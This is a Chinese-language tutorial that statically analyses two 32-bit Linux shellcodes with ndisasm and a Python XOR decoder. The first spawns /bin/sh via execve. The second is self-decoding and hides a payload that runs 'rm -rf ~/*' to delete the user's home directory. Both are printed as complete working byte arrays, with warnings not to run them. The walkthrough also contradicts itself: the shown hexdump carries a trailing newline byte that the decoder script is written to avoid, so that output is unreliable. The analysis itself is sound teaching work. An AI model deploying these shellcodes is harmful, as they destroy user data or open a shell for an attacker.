下面，我们将分析几个已有的 shellcode 的功能，通过分析来了解 shellcode 分析的技巧。本文全部采用静态分析（反汇编 + 在内存中模拟解码），不要在分析机上直接运行这些 shellcode——后面会看到，其中一个的载荷是删除用户主目录。第一个 shellcode 代码如下：
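/*
 * Shellcode 1: execve("/bin/sh", {"/bin/sh", NULL}, NULL) on 32-bit Linux
 * (int 0x80 with eax = 0xb).  It uses the jmp/call/pop trick to obtain the
 * address of the trailing "/bin/shX" string (offset 0x1e) in esi, then
 * overwrites the 'X' placeholder with NUL and stores argv at esi+8 / esi+12.
 * Those stores land at offsets 0x26..0x2d, i.e. PAST the 38 bytes of this
 * array, so the buffer it runs from must be writable, executable and have
 * spare room after it.  The escape sequences below are the real bytes; the
 * original listing had lost its backslashes.
 */
static char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x58";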
|
使用ndisasm反汇编结果如下:
- root@linux:~/pentest# echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58" | ndisasm -u -
- 00000000 EB17 jmp short 0x19
- 00000002 5E pop esi
- 00000003 897608 mov [esi+0x8],esi
- 00000006 31C0 xor eax,eax
- 00000008 884607 mov [esi+0x7],al
- 0000000B 89460C mov [esi+0xc],eax
- 0000000E B00B mov al,0xb
- 00000010 89F3 mov ebx,esi
- 00000012 8D4E08 lea ecx,[esi+0x8]
- 00000015 31D2 xor edx,edx
- 00000017 CD80 int 0x80
- 00000019 E8E4FFFFFF call dword 0x2
- 0000001E 2F das
- 0000001F 62696E bound ebp,[ecx+0x6e]
- 00000022 2F das
- 00000023 7368 jnc 0x8d
- 00000025 58 pop eax
- root@linux:~/pentest#
|
可以看出，这是一个执行 execve("/bin/sh", ...) 的 shellcode。开头的 jmp(0x00)→call(0x19)→pop esi(0x02) 是典型的 jmp/call/pop 技巧：call 把紧随其后的字符串 "/bin/shX"（偏移 0x1e）的地址压栈，pop 之后 esi 就指向该字符串；随后 mov [esi+0x7],al 把占位符 'X' 改写为 NUL 结束符，mov [esi+0x8],esi 和 mov [esi+0xc],eax 在字符串后面构造 argv = {"/bin/sh", NULL}，最后以 eax=0xb(execve)、ebx=esi(路径)、ecx=esi+8(argv)、edx=0(envp) 执行 int 0x80。注意 argv 被写到 esi+0x8～esi+0xf，即偏移 0x26～0x2d，超出了 shellcode 本身（0x26 字节）的范围，所以它要求所在缓冲区可写、可执行且后面至少有 8 字节空余；在开启 NX/DEP 的环境下，放在数据段里的 static 数组是不能直接执行的。第二个 shellcode 代码如下：
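/*
 * Shellcode 2: self-decoding.  Offsets 0x00..0x16 are a decoder stub that
 * uses jmp/call/pop to point esi at offset 0x17, then XORs the following
 * 0x4b (75) bytes with a key that starts at 0xff and is decremented once per
 * byte (mov al,0xff / xor [esi],al / dec al / inc esi / loop), and finally
 * jumps to 0x17.  Everything from 0x17 on is ciphertext until that loop has
 * run, which is why a plain disassembly of it looks like garbage.  The
 * decoded body runs `sh -c "rm -rf ~/* 2>/dev/null"` and then exit() — it is
 * destructive; analyse it statically, never execute it.  The escape
 * sequences below are the real bytes; the original listing had lost its
 * backslashes.
 */
char shellcode2[] =
    "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    "\x7b\x35";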
|
下面使用ndisasm反汇编,结果如下:
- root@linux:~/pentest# echo -ne "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7\x7b\x35" | ndisasm -u -
- 00000000 EB10 jmp short 0x12
- 00000002 5E pop esi
- 00000003 31C9 xor ecx,ecx
- 00000005 B14B mov cl,0x4b
- 00000007 B0FF mov al,0xff
- 00000009 3006 xor [esi],al
- 0000000B FEC8 dec al
- 0000000D 46 inc esi
- 0000000E E2F9 loop 0x9
- 00000010 EB05 jmp short 0x17
- 00000012 E8EBFFFFFF call dword 0x2
- 00000017 17 pop ss
- 00000018 DB db 0xdb
- 00000019 FD std
- 0000001A FC cld
- 0000001B FB sti
- 0000001C D59B aad 0x9b
- 0000001E 91 xchg eax,ecx
- 0000001F 99 cdq
- 00000020 D9869CF38199 fld dword [esi-0x667e0c64]
- 00000026 F0C28DED lock ret 0xed8d
- 0000002A 9E sahf
- 0000002B 86CA xchg cl,dl
- 0000002D C49A81C69BCB les ebx,[edx-0x3464397f]
- 00000033 C9 leave
- 00000034 C2D3DE ret 0xded3
- 00000037 F0BAB8AAF4B4 lock mov edx,0xb4f4aab8
- 0000003D AC lodsb
- 0000003E B4BB mov ah,0xbb
- 00000040 D6 salc
- 00000041 88E5 mov ch,ah
- 00000043 13825C8DC19D adc eax,[edx-0x623e72a4]
- 00000049 40 inc eax
- 0000004A 91 xchg eax,ecx
- 0000004B C0994495CF954C rcr byte [ecx-0x6a306abc],0x4c
- 00000052 2F das
- 00000053 4A dec edx
- 00000054 23F0 and esi,eax
- 00000056 120F adc cl,[edi]
- 00000058 B570 mov ch,0x70
- 0000005A 3C32 cmp al,0x32
- 0000005C 7988 jns 0xffffffe6
- 0000005E 78F7 js 0x57
- 00000060 7B35 jpo 0x97
- root@linux:~/pentest#
|
从反汇编可以看出，偏移 0x00～0x16 是一个自解码 stub：它同样用 jmp/call/pop 把偏移 0x17 的地址放入 esi，然后以 ecx=0x4b(75) 为计数、al 初始为 0xff 并在每一字节后递减作为密钥，对 0x17 之后的 75 字节逐字节做 xor（xor [esi],al / dec al / inc esi / loop），解码完成后 jmp 到 0x17 执行真正的载荷。0x17 之后的反汇编是乱码，正是因为那部分在运行前还是密文。接下来，我们用一个 python 脚本在内存中重现这个解码过程（只解码、不执行），再用 hexdump 查看结果：
- root@linux:~/pentest# cat decode.py
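#!/usr/bin/env python
"""Decode the self-decrypting second shellcode the same way its stub does.

The stub at offsets 0x00-0x16 XORs the 0x4b bytes that follow offset 0x17
with a key that starts at 0xff and is decremented once per byte
(mov al,0xff / xor [esi],al / dec al / inc esi / loop).  This script
replays that loop in memory and writes the decoded bytes to stdout; it
never executes them.  Works under both Python 2 and Python 3.
"""
import sys

# Raw shellcode2 bytes as given in the listing (stub + encoded body).
sc = (
    b"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    b"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    b"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    b"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    b"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    b"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    b"\x7b\x35"
)

# Offset the stub's call/pop leaves in esi: the first encoded byte.
BODY_OFFSET = 0x17


def decode(data, offset=BODY_OFFSET):
    """Return the decoded body of `data` (everything from `offset` on).

    Byte i of the body is XORed with (0xff - i), mirroring the stub's
    decrementing key register.  Returns a bytes object (str on Python 2).
    """
    body = bytearray(data[offset:])
    return bytes(bytearray((b ^ (0xff - i)) & 0xff for i, b in enumerate(body)))


if __name__ == "__main__":
    # Write raw bytes, not text: `print` would append a newline (a stray 0x0a
    # byte after the 0x4b decoded bytes, which then shows up in hexdump and
    # ndisasm output) and Python 3 would refuse to print binary data through
    # a text stream.
    out = getattr(sys.stdout, "buffer", sys.stdout)
    out.write(decode(sc))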
- root@linux:~/pentest# ./decode.py | hexdump -C
- 00000000 e8 25 00 00 00 2f 62 69 6e 2f 73 68 00 73 68 00 |.%.../bin/sh.sh.|
- 00000010 2d 63 00 72 6d 20 2d 72 66 20 7e 2f 2a 20 32 3e |-c.rm -rf ~/* 2>|
- 00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 c0 50 8d 5d |/dev/null.]1.P.]|
- 00000030 0e 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 e1 31 d2 |.S.].S.].S....1.|
- 00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 0a |......1.@...|
- 0000004c
- root@linux:~/pentest#
|
可以看到 "/bin/sh"、"sh"、"-c"、"rm -rf ~/* 2>/dev/null" 几个 NUL 结尾的字符串。解码后的载荷以 call 0x2a 开头，call 后面紧跟这张字符串表，0x2a 处的 pop ebp 取得表的基址；随后压入 0（argv 结尾）、ebp+0xe("rm -rf ~/* 2>/dev/null")、ebp+0xb("-c")、ebp+0x8("sh")，以 ebx=ebp("/bin/sh")、ecx=esp(argv)、edx=0 调用 execve，再用返回值调用 exit——也就是执行 sh -c "rm -rf ~/* 2>/dev/null"，删除当前用户主目录下的全部文件，绝对不能运行。末尾 0x4b 处的 0a 不是 shellcode 的一部分，而是 print 追加的换行。接下来我们用 ndisasm 分析；注意 ndisasm 是线性反汇编，从 0x05 起会把字符串表当作指令解码，直到 0x31 才重新对齐，0x2a～0x30 的正确指令应为 pop ebp / xor eax,eax / push eax / lea ebx,[ebp+0xe]，用 ndisasm -u -o 0x2a -e 0x2a 跳过字符串表即可得到正确的反汇编：
- root@linux:~/pentest# ./decode.py | ndisasm -u -
- 00000000 E825000000 call dword 0x2a
- 00000005 2F das
- 00000006 62696E bound ebp,[ecx+0x6e]
- 00000009 2F das
- 0000000A 7368 jnc 0x74
- 0000000C 007368 add [ebx+0x68],dh
- 0000000F 002D6300726D add [dword 0x6d720063],ch
- 00000015 202D7266207E and [dword 0x7e206672],ch
- 0000001B 2F das
- 0000001C 2A20 sub ah,[eax]
- 0000001E 323E xor bh,[esi]
- 00000020 2F das
- 00000021 6465762F gs jna 0x54
- 00000025 6E outsb
- 00000026 756C jnz 0x94
- 00000028 6C insb
- 00000029 005D31 add [ebp+0x31],bl
- 0000002C C0508D5D rcl byte [eax-0x73],0x5d
- 00000030 0E push cs
- 00000031 53 push ebx
- 00000032 8D5D0B lea ebx,[ebp+0xb]
- 00000035 53 push ebx
- 00000036 8D5D08 lea ebx,[ebp+0x8]
- 00000039 53 push ebx
- 0000003A 89EB mov ebx,ebp
- 0000003C 89E1 mov ecx,esp
- 0000003E 31D2 xor edx,edx
- 00000040 B00B mov al,0xb
- 00000042 CD80 int 0x80
- 00000044 89C3 mov ebx,eax
- 00000046 31C0 xor eax,eax
- 00000048 40 inc eax
- 00000049 CD80 int 0x80
- 0000004B 0A db 0x0a
- root@linux:~/pentest#
|